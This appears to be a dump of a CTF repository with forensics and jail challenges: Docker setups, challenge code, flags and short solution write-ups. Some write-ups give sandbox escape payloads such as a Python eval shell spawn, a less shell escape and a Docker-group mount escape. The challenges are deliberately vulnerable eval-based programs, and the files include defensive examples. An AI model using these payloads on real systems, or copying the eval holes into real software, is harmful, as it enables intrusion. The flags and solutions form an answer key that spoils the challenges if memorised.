/forensics/Investigator_1/solution/README.md:
--------------------------------------------------------------------------------
# Investigator 1

## Write-up

Use the Volatility framework.

## Flag

`shellmates{ESI:liverpool}`
--------------------------------------------------------------------------------
/forensics/Investigator_2/README.md:
--------------------------------------------------------------------------------
# Investigator 2

**`Author:`** [Chih3b](https://github.com/Ch1h3b)

## Description

Something is fishy… can you look for traces?

## Solution

Solution of the challenge can be found [here](solution/).
--------------------------------------------------------------------------------
/forensics/Investigator_2/solution/README.md:
--------------------------------------------------------------------------------
# Investigator 2

## Write-up

Use the Volatility framework.

## Flag

`shellmates{g00d_J0b_$H3rl0cK_H0lme33$}`

--------------------------------------------------------------------------------
/forensics/Investigator_3/README.md:
--------------------------------------------------------------------------------
# Investigator 3

**`Author:`** [Chih3b](https://github.com/Ch1h3b)

## Description

The headmaster heard someone outside the office laughing, he said he XORed his domain name with his favorite number, can you retrieve the real domain name?
Flag format: shellmates{domainname}

## Solution

Solution of the challenge can be found [here](solution/).

--------------------------------------------------------------------------------
/forensics/Investigator_3/solution/README.md:
--------------------------------------------------------------------------------
# Investigator 3

## Write-up

Use the Volatility framework.

## Flag

`shellmates{h3ck3r.b4$}`

--------------------------------------------------------------------------------
/forensics/README.md:
--------------------------------------------------------------------------------
# Forensics

This directory contains challenges related to the `Forensics` category. Please consider reading the [contribution guidelines](../CONTRIBUTING.md) before making any contribution.

--------------------------------------------------------------------------------
/forensics/Smurf/README.md:
--------------------------------------------------------------------------------
# Smurf

**`Author:`** [Elghazali](https://github.com/Elghazali-99)

## Description

Someone is performing a smurf attack by sending a huge number of ICMP packets to the broadcast address.
Examine the traffic carefully and try to find the hidden flag.

## Solution

Solution of the challenge can be found [here](solution/).
--------------------------------------------------------------------------------
/forensics/Smurf/smurf.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/forensics/Smurf/smurf.pcapng
--------------------------------------------------------------------------------
/forensics/Smurf/solution/id.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/forensics/Smurf/solution/id.png
--------------------------------------------------------------------------------
/forensics/Smurf/solution/rickroll.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/forensics/Smurf/solution/rickroll.png
--------------------------------------------------------------------------------
/forensics/agentDNS/README.md:
--------------------------------------------------------------------------------
# agentDNS

**`Author:`** [Chih3b](https://github.com/Ch1h3b)

## Description

I think I'm being hacked, what did they manage to read??

## Solution

Solution of the challenge can be found [here](solution/).
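
From the defender's side, the technique behind this challenge (data carried out in hex-encoded DNS query names under one parent domain, as the write-up reconstructs) can be detected and reassembled from a tshark field export. This is an added example, not code from the repository: the three-column export, the thresholds and the constructed sample rows are assumptions, and only the `secret.base` suffix comes from the write-up.

```python
import binascii
import re
from collections import defaultdict

# Assumed input: tab-separated output of
#   tshark -r capture.pcapng -T fields -e dns.id -e dns.flags.response -e dns.qry.name
HEX_LABEL = re.compile(r"(?:[0-9a-f]{2}){1,31}")  # whole bytes; a label holds at most 63 chars
MAGIC = {b"PK\x03\x04": "zip", b"\x1f\x8b": "gzip", b"%PDF": "pdf"}


def parse_rows(text):
    """Yield (txid, is_response, qname) from the tshark field export."""
    for line in text.splitlines():
        cols = line.split("\t")
        if len(cols) == 3 and cols[2]:
            # Older tshark prints the flag as 0/1, newer as False/True.
            yield cols[0], cols[1].lower() in ("1", "true"), cols[2].rstrip(".").lower()


def find_hex_exfil(rows, base_labels=2, min_queries=3):
    """Group hex-only subdomains by parent domain and decode them in capture order.

    Responses are dropped by their flag and retransmitted queries by
    (txid, qname), instead of keeping every other line.
    """
    seen, chunks = set(), defaultdict(list)
    for txid, is_response, qname in rows:
        if is_response or (txid, qname) in seen:
            continue
        seen.add((txid, qname))
        labels = qname.split(".")
        sub, base = labels[:-base_labels], ".".join(labels[-base_labels:])
        if sub and all(HEX_LABEL.fullmatch(label) for label in sub):
            chunks[base].append("".join(sub))
    findings = {}
    for base, parts in chunks.items():
        if len(parts) < min_queries:
            continue  # one hex-looking label (e.g. "cafe") is not a finding
        payload = binascii.unhexlify("".join(parts))
        kind = next((name for magic, name in MAGIC.items() if payload.startswith(magic)), "unknown")
        findings[base] = {"queries": len(parts), "kind": kind, "payload": payload}
    return findings


def build_sample():
    """Constructed export: benign lookups plus a payload split into 8-byte chunks."""
    payload = b"PK\x03\x04constructed-sample"
    rows = ["0x0001\t0\twww.example.com", "0x0001\t1\twww.example.com",
            "0x0002\t0\tcafe.example.com", "0x0002\t1\tcafe.example.com"]
    for n, start in enumerate(range(0, len(payload), 8)):
        txid = f"0x{n + 16:04x}"
        name = payload[start:start + 8].hex() + ".secret.base"
        # query, retransmitted query, response
        rows += [f"{txid}\t0\t{name}", f"{txid}\t0\t{name}", f"{txid}\t1\t{name}"]
    return "\n".join(rows), payload


def demo():
    text, payload = build_sample()
    return find_hex_exfil(parse_rows(text)), payload


if __name__ == "__main__":
    findings, _ = demo()
    for base, info in findings.items():
        print(f"{base}: {info['queries']} hex queries, payload looks like {info['kind']}")
```
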

--------------------------------------------------------------------------------
/forensics/agentDNS/capture.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/forensics/agentDNS/capture.pcapng
--------------------------------------------------------------------------------
/forensics/agentDNS/solution/README.md:
--------------------------------------------------------------------------------
# agentDNS

## Write-up

This is a basic DNS exfiltration attack. You will first need to read about it a little, or watch this simple [explanation](https://www.youtube.com/watch?v=fQ4Y8napHzw).
First we retrieve all DNS query names via tshark, then we keep every other line, because one line of each pair is the actual query and the second is just its response.

```bash
$ tshark -r capture.pcapng -T fields -e dns.qry.name > hex.txt
```
We decode the hex with a simple Python script!
```python
import binascii

# hex.txt holds one dns.qry.name per packet; each query is followed by its
# response, which repeats the same name, so only every other line is kept.
with open("hex.txt", "r") as f:
    lines = f.readlines()

byte = ""
keep = True
for l in lines:
    if keep:
        # Strip the exfiltration domain so only the hex label remains.
        byte += l.replace(".secret.base", "").replace("\n", "")
    keep = not keep

with open("data", "wb") as f:
    f.write(binascii.unhexlify(byte))
```
We can see that `data` is a zip file; unzip it and read the flag!

```bash
$ file data
data: Zip archive data, at least v2.0 to extract
$ unzip data
$ cat data.txt
```



## Flag

`shellmates{DN$_exf1!tr4Too0oO0r}`
--------------------------------------------------------------------------------
/forensics/ezCap/README.md:
--------------------------------------------------------------------------------
# ezCap

**`Author:`** [Elghazali](https://github.com/Elghazali-99)

## Description

Hmmmmm, there is something fishy inside this traffic! Can you figure it out? Show us your Wireshark skills.

## Solution

Solution of the challenge can be found [here](solution/).
--------------------------------------------------------------------------------
/forensics/ezCap/ezCap.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/forensics/ezCap/ezCap.pcapng
--------------------------------------------------------------------------------
/forensics/ezCap/solution/README.md:
--------------------------------------------------------------------------------
# ezCap

## Write-up

* First, the HTTPS traffic looks authentic, so we can filter it out with:
```code
!tcp and !tls
```

![IMG](filter1.png)

This leaves weird `UDP` traffic on port `1337`.
Select the packet => `Follow` => `UDP stream`.

![IMG](flag.png)
## Flag

`shellmates{1_am_h3r3_h4ck3r_!}`

--------------------------------------------------------------------------------
/forensics/ezCap/solution/filter1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/forensics/ezCap/solution/filter1.png
--------------------------------------------------------------------------------
/forensics/ezCap/solution/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/forensics/ezCap/solution/flag.png
--------------------------------------------------------------------------------
/forensics/lies/README.md:
--------------------------------------------------------------------------------
# lies

**`Author:`** [Your name/nickname](https://link.to/your/website/or/github/account)

## Description

I asked my friend where he is, and he lied to me through this picture. Can you find the datetime of the pic and prove me right?

## Solution

Solution of the challenge can be found [here](solution/).

--------------------------------------------------------------------------------
/forensics/lies/pic.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/forensics/lies/pic.jpeg
--------------------------------------------------------------------------------
/forensics/lies/solution/README.md:
--------------------------------------------------------------------------------
# lies

## Write-up

`exiftool pic.jpeg`

## Flag

`shellmates{2021:10:25}`

--------------------------------------------------------------------------------
/jail/JsandboxS/Dockerfile:
--------------------------------------------------------------------------------
FROM node:alpine

RUN apk update && \
    apk add socat

RUN adduser --disabled-password --no-create-home ctf

COPY challenge /challenge/

WORKDIR /challenge

RUN chmod +x script.js entrypoint.sh

ENTRYPOINT ["./entrypoint.sh"]

--------------------------------------------------------------------------------
/jail/JsandboxS/README.md:
--------------------------------------------------------------------------------
# JsandboxS

**`Author:`** [yh_0x7](https://github.com/yh-0x7)

## Description

> Just a casual JS jail.
> Retrieve the flag and get out of this jail.

## Solution

Solution of the challenge can be found [here](solution/).

--------------------------------------------------------------------------------
/jail/JsandboxS/challenge.yml:
--------------------------------------------------------------------------------
name: "JsandboxS"
author: "yh_0x7"
author_link: "https://github.com/yh-0x7"

category: jail
difficulty: medium

description: |
  > Just a casual JS jail.
  > Retrieve the flag and get out of this jail.

  **Author** : yh_0x7

connection_info: ncat -v --ssl jsandboxs.challs.shellmates.club 443

image: gcr.io/glowing-reserve-336013/jsandboxs

flags:
  - shellmates{y0U_d0N'7_P4r3n7H3515_70_c4Ll_M3}

topics:
  - JS
  - sandbox

tags:
  - medium
  - JS

files:
  - challenge/script.js

value: 500
type: dynamic
extra:
  initial: 500
  decay: 15
  minimum: 50

state: visible
version: "0.1"
--------------------------------------------------------------------------------
/jail/JsandboxS/challenge/.passwd:
--------------------------------------------------------------------------------
shellmates{y0U_d0N'7_P4r3n7H3515_70_c4Ll_M3}
--------------------------------------------------------------------------------
/jail/JsandboxS/challenge/entrypoint.sh:
--------------------------------------------------------------------------------
#!/bin/sh

USER="ctf"
EXEC="./script.js"
PORT=1337

socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr,su="$USER"

--------------------------------------------------------------------------------
/jail/JsandboxS/challenge/script.js:
--------------------------------------------------------------------------------
#!/usr/bin/env node
var fs = require('fs');

const black_list = "0123456789!\"#$%&'()*+-/;<>?@\\^|~\t\n\r\x0b\x0c "

function * func(){
    fs.readFile('./.passwd', 'utf8', function(err, data){
        console.log(data);
    });
}

const readline = require("readline");
const interface = readline.createInterface({
    input: process.stdin,
    output: process.stdout,
});

interface.question(
    "Welcome to JsandboxS, I gave you a secret phone, you have use it to escape \n",
    function (input) {
        interface.close();
        if ( !black_list.split("").some(x => input.includes(x)) )
        {
            try
            {
                eval(input)
            }
            catch(e)
            {
                console.log('you can\'t break the walls :(')
            }
        }
        else
        {
            console.log('you still in jail...you can\'t escape like that')
        }
    }

);

--------------------------------------------------------------------------------
/jail/JsandboxS/docker-compose.yml:
--------------------------------------------------------------------------------
version: "3.3"
services:
  server:
    build: .
    ports:
      - '1337:1337'
    deploy:
      replicas: 1
      restart_policy:
        condition: on-failure
      resources:
        limits:
          memory: 50M
    healthcheck:
      test: socat - TCP4:localhost:1337 || exit 1
      interval: 60s
      timeout: 2s
      retries: 5
--------------------------------------------------------------------------------
/jail/JsandboxS/solution/README.md:
--------------------------------------------------------------------------------
# JsandboxS

## Write-up

- Use `[,]={[Symbol.iterator]:func}` to call the generator `func`: array destructuring invokes the object's `[Symbol.iterator]` method and pulls one value from it, so none of the blacklisted parentheses are needed.

## Flag

`shellmates{y0U_d0N'7_P4r3n7H3515_70_c4Ll_M3}`

--------------------------------------------------------------------------------
/jail/README.md:
--------------------------------------------------------------------------------
# Jail

This directory contains challenges related to the `Jail` category. Please consider reading the [contribution guidelines](../CONTRIBUTING.md) before making any contribution.
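
Two challenges in this directory, `baby jail1` and `baby jail2`, build a calculator on `eval`, the second one behind a substring blacklist. A calculator that only needs arithmetic can parse the input with `ast` and evaluate an allowlist of node types instead, so the decision is made on syntax rather than on the text. This is an added example, not code from the repository; the limits and function names are assumptions.

```python
import ast
import operator

MAX_LEN = 100       # assumed limit: bounds nesting depth and work per request
MAX_EXPONENT = 64   # assumed limits that keep ** from building huge integers
MAX_POW_BASE = 10 ** 6

BINARY_OPS = {
    ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,
    ast.Div: operator.truediv, ast.FloorDiv: operator.floordiv,
    ast.Mod: operator.mod, ast.Pow: operator.pow,
}
UNARY_OPS = {ast.UAdd: operator.pos, ast.USub: operator.neg}


class Rejected(ValueError):
    """Input is not a plain arithmetic expression."""


def evaluate(node):
    """Evaluate an AST made only of numbers and arithmetic operators."""
    if isinstance(node, ast.Constant) and type(node.value) in (int, float):
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in BINARY_OPS:
        left, right = evaluate(node.left), evaluate(node.right)
        if isinstance(node.op, ast.Pow) and (
            abs(right) > MAX_EXPONENT or abs(left) > MAX_POW_BASE
        ):
            raise Rejected("power operands too large")
        return BINARY_OPS[type(node.op)](left, right)
    if isinstance(node, ast.UnaryOp) and type(node.op) in UNARY_OPS:
        return UNARY_OPS[type(node.op)](evaluate(node.operand))
    # Names, calls, attributes, subscripts, strings, lambdas, ... all end here.
    raise Rejected(f"{type(node).__name__} is not arithmetic")


def safe_calc(expr):
    """Drop-in replacement for eval(op) in a calculator."""
    if len(expr) > MAX_LEN:
        raise Rejected("expression too long")
    try:
        tree = ast.parse(expr.strip(), mode="eval")
        return evaluate(tree.body)
    except (SyntaxError, ZeroDivisionError, OverflowError) as exc:
        raise Rejected(str(exc)) from exc


def is_rejected(expr):
    try:
        safe_calc(expr)
    except Rejected:
        return True
    return False


def calc(op):
    """Same output format as the challenge's calc(), without eval."""
    try:
        return f"{op} --> {safe_calc(op)}"
    except Rejected:
        return "Wrong operation"


if __name__ == "__main__":
    # The second input is the payload quoted in the baby jail1 write-up.
    for line in ["1+1", "__import__('os').system('sh')", "2*(3+4)-5", "9**9**9"]:
        print(calc(line))
```
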


--------------------------------------------------------------------------------
/jail/baby-jail1/Dockerfile:
--------------------------------------------------------------------------------
FROM python:3.10-alpine

RUN apk update && \
    apk add socat

RUN adduser --disabled-password --no-create-home ctf

COPY challenge /challenge/

WORKDIR /challenge

RUN chmod +x entrypoint.sh

ENTRYPOINT ["./entrypoint.sh"]

--------------------------------------------------------------------------------
/jail/baby-jail1/README.md:
--------------------------------------------------------------------------------
# baby jail1

**`Author:`** [Ouxs](https://github.com/ouxs-19)

## Description

> Check out my project using python
> Python really has some cool functions

## Solution

Solution of the challenge can be found [here](solution/).
--------------------------------------------------------------------------------
/jail/baby-jail1/challenge.yml:
--------------------------------------------------------------------------------
name: "baby jail1"
author: "Ouxs"
author_link: "https://github.com/ouxs-19/"

category: jail
difficulty: easy

description: |
  > Check out my project using python
  > Python really has some cool functions

  **Author** : Ouxs

connection_info: ncat -v --ssl baby-jail1.challs.shellmates.club 443

image: gcr.io/glowing-reserve-336013/baby-jail1

flags:
  - shellmates{D0n'7_m3$$_W17H_EVAL_kID0}

tags:
  - easy

value: 50
type: dynamic
extra:
  initial: 500
  decay: 15
  minimum: 50

state: visible
version: "0.1"
--------------------------------------------------------------------------------
/jail/baby-jail1/challenge/chall.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3


WELCOME = "I made my calculator app using Python. It's so dope. Try it out."

def calc(op):
    try :
        res = eval(op)
    except :
        return print("Wrong operation")
    return print(f"{op} --> {res}")

def main():
    while True :
        inp = input(">> ")
        calc(inp)

if __name__ == '__main__':
    main()
--------------------------------------------------------------------------------
/jail/baby-jail1/challenge/entrypoint.sh:
--------------------------------------------------------------------------------
#!/bin/sh

USER="ctf"
EXEC="./chall.py"
PORT=1337

socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr,su="$USER"

--------------------------------------------------------------------------------
/jail/baby-jail1/challenge/flag.txt:
--------------------------------------------------------------------------------
shellmates{D0n'7_m3$$_W17H_EVAL_kID0}

--------------------------------------------------------------------------------
/jail/baby-jail1/docker-compose.yml:
--------------------------------------------------------------------------------
version: "3.8"

services:
  server:
    build: .
    ports:
      - "1337:1337"
    deploy:
      replicas: 1
      restart_policy:
        condition: on-failure
      resources:
        limits:
          memory: 50M
    healthcheck:
      test: socat - TCP4:localhost:1337 || exit 1
      interval: 60s
      timeout: 2s
      retries: 5

--------------------------------------------------------------------------------
/jail/baby-jail1/solution/README.md:
--------------------------------------------------------------------------------
# Baby jail 1

## Write-up
In this challenge, we see that if we give an arithmetic operation it will get evaluated.

```
>> 1+1
1+1 --> 2
```

Since we know that the app is built using Python from the description of the challenge, we can assume that the author has used the function `eval` in order to evaluate the expression. This function can be dangerous since it interprets Python code too, thus allowing us to execute whatever we want.

```
__import__('os').system('sh')
ls
cat flag.txt
```

## Flag

`shellmates{D0n'7_m3$$_W17H_EVAL_kID0}`
--------------------------------------------------------------------------------
/jail/baby-jail2/Dockerfile:
--------------------------------------------------------------------------------
FROM python:3.10-alpine

RUN apk update && \
    apk add socat

RUN adduser --disabled-password --no-create-home ctf

COPY challenge /challenge/

WORKDIR /challenge

RUN chmod +x entrypoint.sh

ENTRYPOINT ["./entrypoint.sh"]

--------------------------------------------------------------------------------
/jail/baby-jail2/README.md:
--------------------------------------------------------------------------------
# baby jail2

**`Author:`** [ouxs](https://github.com/ouxs-19)

## Description

> I didn't know it can be that dangerous.
> Now I added some filters

## Solution

Solution of the challenge can be found [here](solution/).
--------------------------------------------------------------------------------
/jail/baby-jail2/challenge.yml:
--------------------------------------------------------------------------------
name: "baby jail2"
author: "Ouxs"
author_link: "https://github.com/ouxs-19/"

category: jail
difficulty: easy

description: |
  > I didn't know it can be that dangerous.
  > Now I added some filters

  **Author** : Ouxs

connection_info: ncat -v --ssl baby-jail2.challs.shellmates.club 443

image: gcr.io/glowing-reserve-336013/baby-jail2

flags:
  - shellmates{Y0u_ar3_st4rting_t0_g3t_g00d_with_LAVE}
tags:
  - easy

value: 500
type: dynamic
extra:
  initial: 500
  decay: 15
  minimum: 50

state: visible
version: "0.1"
--------------------------------------------------------------------------------
/jail/baby-jail2/challenge/chall.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3


WELCOME = "I made my calculator app using Python. It's so dope. Try it out."
BLACKLIST = ["open", "input", "eval", "exec", "import", "getattr", "sh"]
def calc(op):
    try :
        res = eval(op)
    except :
        return print("Wrong operation")
    return print(f"{op} --> {res}")

def main():
    while True :
        inp = input(">> ")
        if any(bad in inp for bad in BLACKLIST) :
            print("Are you tying to hack me !!")
        else :
            calc(inp)

if __name__ == '__main__':
    main()
--------------------------------------------------------------------------------
/jail/baby-jail2/challenge/entrypoint.sh:
--------------------------------------------------------------------------------
#!/bin/sh

USER="ctf"
EXEC="./chall.py"
PORT=1337

socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr,su="$USER"

--------------------------------------------------------------------------------
/jail/baby-jail2/challenge/flag.txt:
--------------------------------------------------------------------------------
shellmates{Y0u_ar3_st4rting_t0_g3t_g00d_with_LAVE}

--------------------------------------------------------------------------------
/jail/baby-jail2/docker-compose.yml:
--------------------------------------------------------------------------------
version: "3.8"

services:
  server:
    build: .
    ports:
      - "1337:1337"
    deploy:
      replicas: 1
      restart_policy:
        condition: on-failure
      resources:
        limits:
          memory: 50M
    healthcheck:
      test: socat - TCP4:localhost:1337 || exit 1
      interval: 60s
      timeout: 2s
      retries: 5

--------------------------------------------------------------------------------
/jail/correct/Dockerfile:
--------------------------------------------------------------------------------
FROM python:3-alpine

RUN apk update && \
    apk add socat libc-dev

RUN adduser --disabled-password --no-create-home ctf
RUN adduser --disabled-password --no-create-home ctf-cracked

COPY challenge /challenge/

WORKDIR /challenge

RUN chown ctf-cracked:ctf wrapper && chown ctf-cracked:ctf chall.py
RUN chmod 750 wrapper && chmod +x entrypoint.sh && chmod 400 chall.py && chmod u+s wrapper

ENTRYPOINT ["./entrypoint.sh"]

--------------------------------------------------------------------------------
/jail/correct/README.md:
--------------------------------------------------------------------------------
# Correct

**`Author:`** [Ouxs](https://github.com/ouxs-19)

## Description
> There is a function **check**, can you take a look at it?

## Solution

Solution of the challenge can be found [here](solution/).

--------------------------------------------------------------------------------
/jail/correct/challenge.yml:
--------------------------------------------------------------------------------
name: "correct"
author: "Ouxs"

category: jail
difficulty: hard

description: |
  > Can you **check** this for me?

  **Author** : Ouxs

connection_info: ncat -v --ssl correct.challs.shellmates.club 443

image: gcr.io/glowing-reserve-336013/correct

value: 500
type: dynamic
extra:
  initial: 500
  decay: 15
  minimum: 50

flags:
  - shellmates{Sn4k3_objects_h4s_b33n_corrupted}

files:
  - challenge/challenge.py

tags:
  - hard

state: visible

version: "0.1"

--------------------------------------------------------------------------------
/jail/correct/challenge/entrypoint.sh:
--------------------------------------------------------------------------------
#!/bin/sh

USER="ctf"
EXEC="./wrapper"
PORT=1337

socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr,su="$USER"

--------------------------------------------------------------------------------
/jail/correct/challenge/wrapper:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/jail/correct/challenge/wrapper
--------------------------------------------------------------------------------
/jail/correct/challenge/wrapper.c:
--------------------------------------------------------------------------------
#include <unistd.h>

/* setuid wrapper: runs chall.py with the wrapper owner's privileges */
int main(void) {
    char *argv[] = { "/usr/local/bin/python3", "/challenge/chall.py", NULL };
    execve(argv[0], argv, NULL);
    return 0;
}

--------------------------------------------------------------------------------
/jail/correct/docker-compose.yml:
--------------------------------------------------------------------------------
version: "3.8"

services:
  server:
    build: .
    ports:
      - "1337:1337"
    deploy:
      replicas: 1
      restart_policy:
        condition: on-failure
      resources:
        limits:
          memory: 50M
    healthcheck:
      test: socat - TCP4:localhost:1337 || exit 1
      interval: 60s
      timeout: 2s
      retries: 5

--------------------------------------------------------------------------------
/jail/correct/solution/README.md:
--------------------------------------------------------------------------------
# correct

## Write-up

There is a function `check` with a condition. Once we pass the condition, we get the flag. The idea is to pass the function an object whose `__eq__` method, which implements `==`, is overridden to return `True` in all cases.

```python
check(type('true', (), {'__eq__': lambda self, wthvr:True})())
```

## Flag

`shellmates{Sn4k3_objects_h4s_b33n_corrupted}`

--------------------------------------------------------------------------------
/jail/escape/challenge.yml:
--------------------------------------------------------------------------------
name: "escape"
author: "mel337"

category: jail
difficulty: hard

description: |
  > Try to replace my VMs
  > **Note** : Use the OVA (my_challenge.ova) that has been shared.
  > **Username**: kiloi
  > **Password**: fghj
  https://drive.google.com/file/d/1LWb2nne5l1VtRal-6mabEvEnUlHjInD2/view?usp=sharing
  **Author** : mel337


value: 500
type: dynamic
extra:
  initial: 500
  decay: 15
  minimum: 50

flags:
  - shellmates{D0ck3R_35cap3_w1th_m0un7}

tags:
  - hard

state: visible

version: "0.1"

--------------------------------------------------------------------------------
/jail/escape/solution/README.md:
--------------------------------------------------------------------------------
# escape

## Write-up


- The user is in the Docker group.

- Using Docker, mount the filesystem in the created container.

- You can find the flag in the `/root` directory.


## Flag

`shellmates{D0ck3R_35cap3_w1th_m0un7}`

--------------------------------------------------------------------------------
/jail/less_jail/Dockerfile:
--------------------------------------------------------------------------------
FROM ubuntu:18.04

RUN apt-get update && \
    apt-get install -y openssh-server sudo less


RUN useradd -m -s /bin/bash ch1
RUN echo 'ch1:ch1' | chpasswd

COPY challenge/real_flag /home/ch1/real_flag
COPY challenge/fakeflag /home/ch1/fakeflag
COPY challenge/my_less /home/ch1/my_less
COPY challenge/perms /etc/sudoers

RUN echo "./my_less\nkill -9 \$(ps | grep bash | awk '{print $1}')" >/home/ch1/.bashrc

RUN chown root:root /home/ch1/real_flag /home/ch1/.bashrc /home/ch1/fakeflag /home/ch1/my_less

RUN chmod 700 /tmp

WORKDIR /challenge

EXPOSE 22


ENTRYPOINT service ssh start && tail -f /dev/null

--------------------------------------------------------------------------------
/jail/less_jail/README.md:
--------------------------------------------------------------------------------
# less_jail

**`Author:`** [1m4D](https://github.com/imadbourouche)

## Description

> Can you escape from my less jail

## Solution

Solution of the challenge can be found [here](solution/).

--------------------------------------------------------------------------------
/jail/less_jail/challenge.yml:
--------------------------------------------------------------------------------
name: "less_jail"
author: "1m4D"

category: jail
difficulty: easy

description: |
  > Can you escape from my less jail

  **Password** : ch1
  **Author** : 1m4D

connection_info: ssh ch1@less-jail -o ProxyCommand="openssl s_client -quiet -connect less-jail.challs.shellmates.club:443 -servername less-jail.challs.shellmates.club"

image: gcr.io/glowing-reserve-336013/less-jail

flags:
  - shellmates{My_LE$$_J41L_1S_VERy_We4K_76423}

tags:
  - easy
  - linux

value: 500

type: dynamic

extra:
  initial: 500
  decay: 15
  minimum: 50

state: visible

version: "0.1"

--------------------------------------------------------------------------------
/jail/less_jail/challenge/fakeflag:
--------------------------------------------------------------------------------
You can read the fake flag but not the real one XD: shellmates{FAKE_FLAG}

--------------------------------------------------------------------------------
/jail/less_jail/challenge/my_less:
--------------------------------------------------------------------------------
#!/bin/sh

/usr/bin/less fakeflag

--------------------------------------------------------------------------------
/jail/less_jail/challenge/perms:
--------------------------------------------------------------------------------
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults env_reset
Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root ALL=(ALL:ALL) ALL

ch1 ALL=(ch1-cracked) NOPASSWD: /challenge/my_less

# See sudoers(5) for more information on "#include" directives:

#includedir /etc/sudoers.d

--------------------------------------------------------------------------------
/jail/less_jail/challenge/real_flag:
--------------------------------------------------------------------------------
shellmates{My_LE$$_J41L_1S_VERy_We4K_76423}
--------------------------------------------------------------------------------
/jail/less_jail/docker-compose.yml:
--------------------------------------------------------------------------------
version: "3.3"
services:
  server:
    build: .
    ports:
      - '1337:22'
    deploy:
      replicas: 1
      restart_policy:
        condition: on-failure
      resources:
        limits:
          memory: 50M
    healthcheck:
      test: socat - TCP4:localhost:1337 || exit 1
      interval: 60s
      timeout: 2s
      retries: 5
--------------------------------------------------------------------------------
/jail/less_jail/solution/README.md:
--------------------------------------------------------------------------------
# less_jail

## Write-up

- In `less`, type `!/bin/sh` to get a shell, then `ls` to find the name of the real flag file, which is *real_flag*, and then `cat real_flag`.

## Flag

`shellmates{My_LE$$_J41L_1S_VERy_We4K_76423}`

--------------------------------------------------------------------------------
/jail/pickle-games-1/Dockerfile:
--------------------------------------------------------------------------------
FROM python:3.9-alpine

RUN apk update && \
    apk add socat

RUN adduser --disabled-password --no-create-home ctf

COPY challenge /challenge/

WORKDIR /challenge

RUN chmod +x challenge.py entrypoint.sh

EXPOSE 1337

ENTRYPOINT ["./entrypoint.sh"]

--------------------------------------------------------------------------------
/jail/pickle-games-1/README.md:
--------------------------------------------------------------------------------
# pickle games 1

**`Author:`** [chenx3n](https://github.com/malikDaCoda)

## Description

> Ever heard of the pickle games, they're very tasty!
> Can you get RCE on the remote server?

**Connect with** : ncat -v --ssl pickle-games-1.challs.shellmates.club 443

[challenge.py](./challenge/challenge.py)

## Solution

Solution of the challenge can be found [here](solution/).
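
The linked `challenge.py` hands untrusted bytes to `pickle.loads` after nothing more than a length check, and a pickle can name any importable callable to run during loading. The hardened counterpart below keeps the size limit but refuses every global lookup, and lists the globals a blob references without loading it. This is an added example, not code from the repository; the class and function names and the harmless `sorted` probe are constructed for illustration.

```python
import io
import pickle
import pickletools

MAX_LEN = 400  # same size limit as the challenge's check()


class DataOnlyUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global lookup.

    Dicts, lists, tuples, strings, bytes, numbers, None and booleans have
    their own opcodes and never reach find_class(); anything that needs an
    importable name (a class, a function, a REDUCE target) does.
    """

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def safe_loads(data):
    """Size check plus data-only unpickling."""
    if len(data) > MAX_LEN:
        raise ValueError("pickle too large")
    return DataOnlyUnpickler(io.BytesIO(data)).load()


def referenced_globals(data):
    """List (module, name) pairs a pickle would import, without loading it.

    Heuristic for triage and logging: STACK_GLOBAL takes its operands from
    the stack, so the two most recent string pushes are reported.
    """
    found, strings = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            strings.append(arg)
        elif opcode.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            found.append((strings[-2], strings[-1]))
    return found


class Probe:
    """Constructed sample: unpickling it calls builtins.sorted([3, 1, 2])."""

    def __reduce__(self):
        return (sorted, ([3, 1, 2],))


def build_probe():
    return pickle.dumps(Probe())


def demo():
    blob = build_probe()
    results = {"globals": referenced_globals(blob)}
    # Plain pickle.loads runs the referenced callable while loading.
    results["pickle.loads"] = pickle.loads(blob)
    try:
        safe_loads(blob)
        results["safe_loads"] = "accepted"
    except pickle.UnpicklingError as exc:
        results["safe_loads"] = f"rejected: {exc}"
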